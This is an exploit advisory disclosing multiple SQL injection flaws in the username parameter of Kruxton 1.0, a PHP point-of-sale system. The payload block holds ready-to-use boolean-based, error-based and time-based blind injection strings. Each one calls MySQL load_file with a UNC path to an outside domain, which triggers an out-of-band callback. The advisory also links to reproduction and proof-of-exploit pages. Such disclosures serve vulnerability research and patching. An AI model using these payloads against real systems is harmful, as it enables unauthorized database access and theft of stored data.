Headline
Kruxton 1.0 SQL Injection
Kruxton version 1.0 suffers from a remote SQL injection vulnerability.
## Title: kruxton-1.0-Multiple-SQLi## Author: nu11secur1ty## Date: 04/15/2024## Vendor: https://www.mayurik.com/## Software: https://www.sourcecodester.com/php/16127/best-pos-management-system-php.html## Reference: https://portswigger.net/web-security/sql-injection## Description:The username parameter appears to be vulnerable to SQL injectionattacks. The payload '+(selectload_file('\\\\t0u6cqoe8kv4cpolkvjk3zq37udn1dp4sskfa3z.tupaciganka.com\\ddi'))+'was submitted in the username parameter. This payload injects a SQLsub-query that calls MySQL's load_file function with a UNC file paththat references a URL on an external domain. The applicationinteracted with that domain, indicating that the injected SQL querywas executed.The attacker can get all information from the system byusing this vulnerability!STATUS: HIGH- Vulnerability[+]Payload:```mysql---Parameter: username (POST) Type: boolean-based blind Title: OR boolean-based blind - WHERE or HAVING clause (NOT) Payload: [email protected]'+(selectload_file('\\\\t0u6cqoe8kv4cpolkvjk3zq37udn1dp4sskfa3z.tupaciganka.com\\ddi'))+''OR NOT 7810=7810 OR 'LaNe'='bRUy&password=v0N!p1j!S6 Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY orGROUP BY clause (FLOOR) Payload: [email protected]'+(selectload_file('\\\\t0u6cqoe8kv4cpolkvjk3zq37udn1dp4sskfa3z.tupaciganka.com\\ddi'))+''AND (SELECT 1998 FROM(SELECT COUNT(*),CONCAT(0x7178786b71,(SELECT(ELT(1998=1998,1))),0x716b627071,FLOOR(RAND(0)*2))x FROMINFORMATION_SCHEMA.PLUGINS GROUP BY x)a) OR'jdui'='fNTo&password=v0N!p1j!S6 Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: [email protected]'+(selectload_file('\\\\t0u6cqoe8kv4cpolkvjk3zq37udn1dp4sskfa3z.tupaciganka.com\\ddi'))+''AND (SELECT 2923 FROM (SELECT(SLEEP(7)))UJBe) OR'ffIk'='SAqf&password=v0N!p1j!S6---```## Reproduce:[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/mayuri_k/2023/kruxton-1.0/Multiple-SQLi)## Proof and Exploit:[href](https://www.nu11secur1ty.com/2024/04/kruxton-10-multiple-sqli.html)## Time spent:01:15:00